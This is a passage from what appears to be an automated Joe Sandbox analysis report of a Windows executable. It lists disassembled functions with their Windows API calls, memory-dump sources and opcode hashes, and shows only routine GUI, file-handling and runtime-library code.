                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Malloc
                                                                              • String ID:
                                                                              • API String ID: 2696272793-0
                                                                              • Opcode ID: edb9cf2eef6c84e03b317fef9ddc2bc279261445e07fd82aa7e1408532c61c1c
                                                                              • Instruction ID: 9f69b38e5b2ce5ae033f5d9496714f7f45baa8fce4a68657fd73fe36b70b756b
                                                                              • Opcode Fuzzy Hash: edb9cf2eef6c84e03b317fef9ddc2bc279261445e07fd82aa7e1408532c61c1c
                                                                              • Instruction Fuzzy Hash: BDE01730A113268FD735BF14E408763BAE8BB05726F14981EE1E9D7256E37EA8408B94
                                                                              Function 00E97351 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SystemParametersInfoA.USER32(00000029,?,?,00000000), ref: 00E97371
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: InfoParametersSystem
                                                                              • String ID:
                                                                              • API String ID: 3098949447-0
                                                                              • Opcode ID: 9bcc78087fd5675d8fadd87f57e656e6039b2f23d02bd5d2e61f6fcbe14e78e0
                                                                              • Instruction ID: 42809a78e82055e66620d87e1346e614993d86f1911e743f2b469a2ba37334a9
                                                                              • Opcode Fuzzy Hash: 9bcc78087fd5675d8fadd87f57e656e6039b2f23d02bd5d2e61f6fcbe14e78e0
                                                                              • Instruction Fuzzy Hash: 20D05E70218A04DFE715CB40D84ABB537A8F741B05F100028E6094F380D6B12804DB60
                                                                              Function 00FF1B5A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(00000000,00000000,?,00FF1F50,?,?,00000000,?,00FF1F50,00000000,0000000C), ref: 00FF1B77
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 4470d78ec450f14b01fc1f4ce4b3848273774dd79d1457101dd84d420aab5030
                                                                              • Instruction ID: ebf02cf9caaf1b9a1bd1e0dd1c77bd2ea9825bb2731601e2b6c747f385cb0a76
                                                                              • Opcode Fuzzy Hash: 4470d78ec450f14b01fc1f4ce4b3848273774dd79d1457101dd84d420aab5030
                                                                              • Instruction Fuzzy Hash: E6D06C3200010DBFDF128F85DD06EDA3BAAFB48714F014100BA585A120C736E821AB90
                                                                              Function 00FD3FC4 Relevance: 1.5, APIs: 1, Instructions: 12COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _free.LIBCMT ref: 00FD3FD7
                                                                                • Part of subcall function 00FE26C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00FE2F36,00000000,00000000,01063F78,00000000,00000007,000000FF,?,00E86776,00E9945F,00000000,?), ref: 00FE26DE
                                                                                • Part of subcall function 00FE26C8: GetLastError.KERNEL32(00000000,?,00FE2F36,00000000,00000000,01063F78,00000000,00000007,000000FF,?,00E86776,00E9945F,00000000,?,?,00E98A17), ref: 00FE26F0
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFreeHeapLast_free
                                                                              • String ID:
                                                                              • API String ID: 1353095263-0
                                                                              • Opcode ID: aadc496672b04f7b8a0bae5714cb5bae19e4c543da9a865e90f55482f1750a0b
                                                                              • Instruction ID: ff7407b139e3aa68c4814afb7bd2748cfb53133c1e455a5f4098dbb003014adc
                                                                              • Opcode Fuzzy Hash: aadc496672b04f7b8a0bae5714cb5bae19e4c543da9a865e90f55482f1750a0b
                                                                              • Instruction Fuzzy Hash: 69C08C3140520CBBCB10EF8AEC07A5EBFACDB80320F200288FC0C07211EA72AE10A6D5
                                                                              Function 00E9A307 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DeleteObject.GDI32(00000000), ref: 00E9A316
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: DeleteObject
                                                                              • String ID:
                                                                              • API String ID: 1531683806-0
                                                                              • Opcode ID: 4e6a3753066d67e3352e37075b3acf419572ca19c9e566255f8f9417ba1612e2
                                                                              • Instruction ID: 346d468f005440c31bc103ff8fb5d38812fdcd7eb0240d44b92756cf5fe8761e
                                                                              • Opcode Fuzzy Hash: 4e6a3753066d67e3352e37075b3acf419572ca19c9e566255f8f9417ba1612e2
                                                                              • Instruction Fuzzy Hash: B9B092B0806100FFDE11EB30861D32A35A46F4130AF08ACA4B001A6005DABEC0028691
                                                                              Function 00E86D8B Relevance: 1.3, APIs: 1, Instructions: 35COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,00000000,?,?,?,00E86911,?), ref: 00E86DBE
                                                                                • Part of subcall function 00E8740F: MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,?,00000000), ref: 00E8741E
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide
                                                                              • String ID:
                                                                              • API String ID: 626452242-0
                                                                              • Opcode ID: 86d93e05fcf2f41c1e2fca28b66d321ff67903ffb08fa88dd83da23704520c8f
                                                                              • Instruction ID: e83cec6c074fbd735e83e72d4f5f2e7e5bd118bb30a6c41599a5951bec3c19b1
                                                                              • Opcode Fuzzy Hash: 86d93e05fcf2f41c1e2fca28b66d321ff67903ffb08fa88dd83da23704520c8f
                                                                              • Instruction Fuzzy Hash: 21F0E53730D1347BDA263659AC05FBE3A8E9F817A1F246126B60CBA2D0CE608C0183F0
                                                                              Function 00E8740F Relevance: 1.3, APIs: 1, Instructions: 13COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,?,00000000), ref: 00E8741E
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide
                                                                              • String ID:
                                                                              • API String ID: 626452242-0
                                                                              • Opcode ID: a84cebb7080cfec73fc7f1a3e627f83004dfc5accdc27cffe5a89227cb92b55c
                                                                              • Instruction ID: 329e6f8e4778de722a1510a7343fe367d8c5d6ecea6d5596e3263103ff2f0e3f
                                                                              • Opcode Fuzzy Hash: a84cebb7080cfec73fc7f1a3e627f83004dfc5accdc27cffe5a89227cb92b55c
                                                                              • Instruction Fuzzy Hash: 4FC092B524C20D7EFE022AE4AC05E773B5CE710B70F108314BE2CC92D4D9A29D1057B1

                                                                              Non-executed Functions

                                                                              Function 00F3E027 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 166fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3_GS.LIBCMT ref: 00F3E031
                                                                              • GetFullPathNameA.KERNEL32(?,00000104,?,?,00000158,00F3D911,?,?,00000000,?,00F45521,00000024,?,?,?), ref: 00F3E064
                                                                              • PathIsUNCA.SHLWAPI(?,?,?,00000000,?,00F45521,00000024,?,?,?), ref: 00F3E0DC
                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,00F45521,00000024,?,?,?), ref: 00F3E100
                                                                              • __cftof.LIBCMT ref: 00F3E078
                                                                                • Part of subcall function 00F3DFFA: GetLastError.KERNEL32(?,?,00F3E111,?,?,?,00F45521,00000024,?,?,?), ref: 00F3E005
                                                                                • Part of subcall function 00F3D98A: __cftof.LIBCMT ref: 00F3D9AF
                                                                                • Part of subcall function 00F3D98A: PathStripToRootA.SHLWAPI(00000000,00000000,?,00F45521,00000024,?,?,?), ref: 00F3D9BE
                                                                              • CharUpperA.USER32(?,?,00F45521,00000024,?,?,?), ref: 00F3E12E
                                                                              • FindFirstFileA.KERNEL32(?,?,?,00F45521,00000024,?,?,?), ref: 00F3E146
                                                                              • FindClose.KERNEL32(00000000,?,00F45521,00000024,?,?,?), ref: 00F3E152
                                                                              • _strlen.LIBCMT ref: 00F3E171
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Path$Find__cftof$CharCloseErrorFileFirstFullH_prolog3_InformationLastNameRootStripUpperVolume_strlen
                                                                              • String ID: J$
                                                                              • API String ID: 2731638371-2399298887
                                                                              • Opcode ID: 1f8a2ab0310413b172ec34b512d4f010f43aaa649f7a0358ce317e0044c9282f
                                                                              • Instruction ID: 15c6d2dd71a52a3135be65c6c30af6ae712bedf73541bd7f38456b01a9b2dd12
                                                                              • Opcode Fuzzy Hash: 1f8a2ab0310413b172ec34b512d4f010f43aaa649f7a0358ce317e0044c9282f
                                                                              • Instruction Fuzzy Hash: B2519272A00619EFDB25BFA4CD46BEEB3BCBF44321F000559F419A6281DB389E459B60
                                                                              Function 00ECA285 Relevance: 49.9, APIs: 33, Instructions: 438COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowRect.USER32(?,?), ref: 00ECA2BC
                                                                              • PtInRect.USER32(?,?,?), ref: 00ECA2CC
                                                                              • GetClientRect.USER32(?,?), ref: 00ECA2ED
                                                                                • Part of subcall function 00E9A1C3: ClientToScreen.USER32(?,?), ref: 00E9A1D2
                                                                                • Part of subcall function 00E9A1C3: ClientToScreen.USER32(?,?), ref: 00E9A1DF
                                                                              • PtInRect.USER32(?,?,?), ref: 00ECA308
                                                                              • GetSystemMetrics.USER32(0000000D), ref: 00ECA33C
                                                                              • GetSystemMetrics.USER32(0000000E), ref: 00ECA34C
                                                                              • PtInRect.USER32(?,?,?), ref: 00ECA38E
                                                                              • OffsetRect.USER32(?,?,?), ref: 00ECA3E9
                                                                              • PtInRect.USER32(?,?,?), ref: 00ECA3F9
                                                                              • SetRect.USER32(?,?,?,00000000,00000000), ref: 00ECA4B0
                                                                              • PtInRect.USER32(?,?,?), ref: 00ECA4C0
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$Client$MetricsScreenSystem$OffsetWindow
                                                                              • String ID:
                                                                              • API String ID: 509473180-0
                                                                              • Opcode ID: fee35180127d24c5cb9f108a06faec1eff8412cde329dacbf77d76996b79112f
                                                                              • Instruction ID: 153c8d44b3d66fab4292a9e4f85e51670e7dea0e69c2d881fd38cf0c4f4cca92
                                                                              • Opcode Fuzzy Hash: fee35180127d24c5cb9f108a06faec1eff8412cde329dacbf77d76996b79112f
                                                                              • Instruction Fuzzy Hash: ABF1D871A0020DAFCF15DFE4C948EEEBBB9BF08348F144129E915EB240D636DA15DB61
                                                                              Function 00EB43C6 Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 419windowkeyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Focus$MessageParentStateWindow$BeepDialogH_prolog3_catch
                                                                              • String ID: +
                                                                              • API String ID: 44247675-2126386893
                                                                              • Opcode ID: d8b38b4be1c5b39ee652e703e153970f2b42b1d5dd7bfa706c19868ea3e1be04
                                                                              • Instruction ID: 8efed11fc61d5e77e32de3851a86e05a62a3641694b921fd5bbec75a5c5db3b3
                                                                              • Opcode Fuzzy Hash: d8b38b4be1c5b39ee652e703e153970f2b42b1d5dd7bfa706c19868ea3e1be04
                                                                              • Instruction Fuzzy Hash: 82D1BDB29006159FCF26ABA49845BEF7BB4FF09714F146029F952BB2D3DB349C418B90
                                                                              Function 00E8A232 Relevance: 28.6, APIs: 19, Instructions: 80COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CloseThemeData.UXTHEME(00000000,00E81D2C,00E81D2C,?,00000000,00E91F5B,00000002,00000000,?,00000000,?,00E81D2C,01004830), ref: 00E8A23E
                                                                              • CloseThemeData.UXTHEME(00000000,00E81D2C,00E81D2C,?,00000000,00E91F5B,00000002,00000000,?,00000000,?,00E81D2C,01004830), ref: 00E8A24D
                                                                              • CloseThemeData.UXTHEME(00000000,00E81D2C,00E81D2C,?,00000000,00E91F5B,00000002,00000000,?,00000000,?,00E81D2C,01004830), ref: 00E8A25C
                                                                              • CloseThemeData.UXTHEME(00000000,00E81D2C,00E81D2C,?,00000000,00E91F5B,00000002,00000000,?,00000000,?,00E81D2C,01004830), ref: 00E8A26B
                                                                              • CloseThemeData.UXTHEME(00000000,00E81D2C,00E81D2C,?,00000000,00E91F5B,00000002,00000000,?,00000000,?,00E81D2C,01004830), ref: 00E8A27A
                                                                              • CloseThemeData.UXTHEME(00000000,00E81D2C,00E81D2C,?,00000000,00E91F5B,00000002,00000000,?,00000000,?,00E81D2C,01004830), ref: 00E8A289
                                                                              • CloseThemeData.UXTHEME(00000000,00E81D2C,00E81D2C,?,00000000,00E91F5B,00000002,00000000,?,00000000,?,00E81D2C,01004830), ref: 00E8A298
                                                                              • CloseThemeData.UXTHEME(00000000,00E81D2C,00E81D2C,?,00000000,00E91F5B,00000002,00000000,?,00000000,?,00E81D2C,01004830), ref: 00E8A2A7
                                                                              • CloseThemeData.UXTHEME(00000000,00E81D2C,00E81D2C,?,00000000,00E91F5B,00000002,00000000,?,00000000,?,00E81D2C,01004830), ref: 00E8A2B6
                                                                              • CloseThemeData.UXTHEME(00000000,00E81D2C,00E81D2C,?,00000000,00E91F5B,00000002,00000000,?,00000000,?,00E81D2C,01004830), ref: 00E8A2C5
                                                                              • CloseThemeData.UXTHEME(00000000,00E81D2C,00E81D2C,?,00000000,00E91F5B,00000002,00000000,?,00000000,?,00E81D2C,01004830), ref: 00E8A2D4
                                                                              • CloseThemeData.UXTHEME(00000000,00E81D2C,00E81D2C,?,00000000,00E91F5B,00000002,00000000,?,00000000,?,00E81D2C,01004830), ref: 00E8A2E3
                                                                              • CloseThemeData.UXTHEME(00000000,00E81D2C,00E81D2C,?,00000000,00E91F5B,00000002,00000000,?,00000000,?,00E81D2C,01004830), ref: 00E8A2F2
                                                                              • CloseThemeData.UXTHEME(00000000,00E81D2C,00E81D2C,?,00000000,00E91F5B,00000002,00000000,?,00000000,?,00E81D2C,01004830), ref: 00E8A301
                                                                              • CloseThemeData.UXTHEME(00000000,00E81D2C,00E81D2C,?,00000000,00E91F5B,00000002,00000000,?,00000000,?,00E81D2C,01004830), ref: 00E8A310
                                                                              • CloseThemeData.UXTHEME(00000000,00E81D2C,00E81D2C,?,00000000,00E91F5B,00000002,00000000,?,00000000,?,00E81D2C,01004830), ref: 00E8A31F
                                                                              • CloseThemeData.UXTHEME(00000000,00E81D2C,00E81D2C,?,00000000,00E91F5B,00000002,00000000,?,00000000,?,00E81D2C,01004830), ref: 00E8A32E
                                                                              • CloseThemeData.UXTHEME(00000000,00E81D2C,00E81D2C,?,00000000,00E91F5B,00000002,00000000,?,00000000,?,00E81D2C,01004830), ref: 00E8A33D
                                                                              • CloseThemeData.UXTHEME(00000000,00E81D2C,00E81D2C,?,00000000,00E91F5B,00000002,00000000,?,00000000,?,00E81D2C,01004830), ref: 00E8A34C
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: CloseDataTheme
                                                                              • String ID:
                                                                              • API String ID: 2797872399-0
                                                                              • Opcode ID: 659f9567599ed9ddb23f67129a9454de1f37a3155d60230def3b046eaa94bc2c
                                                                              • Instruction ID: 721990662c215fa309a62581335286bbc782023ab15d09441b1b46d0617259e3
                                                                              • Opcode Fuzzy Hash: 659f9567599ed9ddb23f67129a9454de1f37a3155d60230def3b046eaa94bc2c
                                                                              • Instruction Fuzzy Hash: 99311C30051B10EFE7376B15E90C756BBF2FB0470AF486969E0CA648B4877AA994DF21
                                                                              Function 00EBA25B Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 243fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3_GS.LIBCMT ref: 00EBA265
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,010041EC,00000000,010092CC,00000000,01005730,00000000,00E81D2C,00000000,0000052C,00EBB301,?,00000000,00000038), ref: 00EBA2FB
                                                                              • _strlen.LIBCMT ref: 00EBA382
                                                                              • CreateFileA.KERNEL32(00E81D2C,80000000,00000001,00000000,00000003,00000000,00000000,01005730,00000000,00E81D2C,00000000,0000052C,00EBB301,?,00000000,00000038), ref: 00EBA3B0
                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,00EB700F,00E81D2C,00E81D2C,00E81D2C,01004830,00E81D2C,00E81E24,00E81E24,?,00EB83D0,?,?), ref: 00EBA3C0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: File$CreateH_prolog3_ModuleNameSize_strlen
                                                                              • String ID: PNG
                                                                              • API String ID: 523348133-364855578
                                                                              • Opcode ID: 68f11cf26ea2573dac6476dba9f1fa2c1d74a31f60eb058e3d04cc0055f18687
                                                                              • Instruction ID: e57849945fef3c44f8893eec8d85b8ee979d12f68eb3de47ed2a429422be40be
                                                                              • Opcode Fuzzy Hash: 68f11cf26ea2573dac6476dba9f1fa2c1d74a31f60eb058e3d04cc0055f18687
                                                                              • Instruction Fuzzy Hash: 1081D171900218ABCF32AB60CC89FEF77BCAF45710F145169F959BB181DA749A81CF61
                                                                              Function 00EB80C6 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 214COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3_GS.LIBCMT ref: 00EB80D0
                                                                              • GetObjectA.GDI32(00000000,00000018,?), ref: 00EB810E
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00EB814D
                                                                              • SelectObject.GDI32(?,00000000), ref: 00EB8170
